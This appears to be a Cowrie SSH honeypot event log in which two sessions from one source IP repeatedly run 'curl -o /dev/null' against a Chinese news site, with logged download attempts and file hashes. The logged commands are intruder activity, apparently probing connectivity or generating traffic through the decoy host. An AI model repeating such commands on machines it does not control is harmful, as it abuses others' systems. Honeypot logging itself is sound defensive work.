{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.833252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.865559Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.867500Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.906343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.907603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.912394Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.914371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.951928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.953327Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.969866Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.973093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.002884Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.011805Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.027996Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.031806Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.033338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.057077Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.057693Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.075002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.075929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.101547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.103460Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.115953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.117258Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.130406Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.131562Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.161104Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.162684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.170269Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.171138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.204098Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.205184Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.209883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.210996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.250121Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.251282Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.278858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.280080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.388386Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.389587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.396521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.397625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.409144Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.411045Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.448667Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.450725Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.468491Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.469975Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.511133Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.512581Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.544054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.545259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.561469Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.563135Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.575395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.576229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.596090Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.597368Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.607108Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.609748Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.622425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.623810Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.640310Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.641869Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.660307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.661653Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.691957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.693424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.702701Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.704702Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.708800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.709874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.742396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.743955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.760304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.761464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.777423Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.843086Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.867544Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.870883Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.874316Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.879397Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.880640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.895273Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.896948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.941021Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.942575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:11.948630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.950029Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:11.952080Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.071787Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.113719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.115044Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.119374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.120755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.141061Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.157979Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.159162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.164423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.165543Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.200019Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.201175Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.203219Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.204919Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.213122Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.243650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.245090Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.249398Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.251138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.263571Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.285697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.287007Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.290523Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.292275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.376722Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.427886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:12.429634Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:12.433596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
